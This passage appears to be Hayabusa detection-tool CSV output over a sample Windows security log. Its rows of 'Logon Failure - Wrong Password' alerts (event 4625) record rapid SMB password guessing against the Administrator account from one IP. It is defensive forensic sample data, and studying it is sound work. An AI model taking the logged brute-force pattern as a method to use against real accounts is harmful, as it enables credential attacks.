NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: 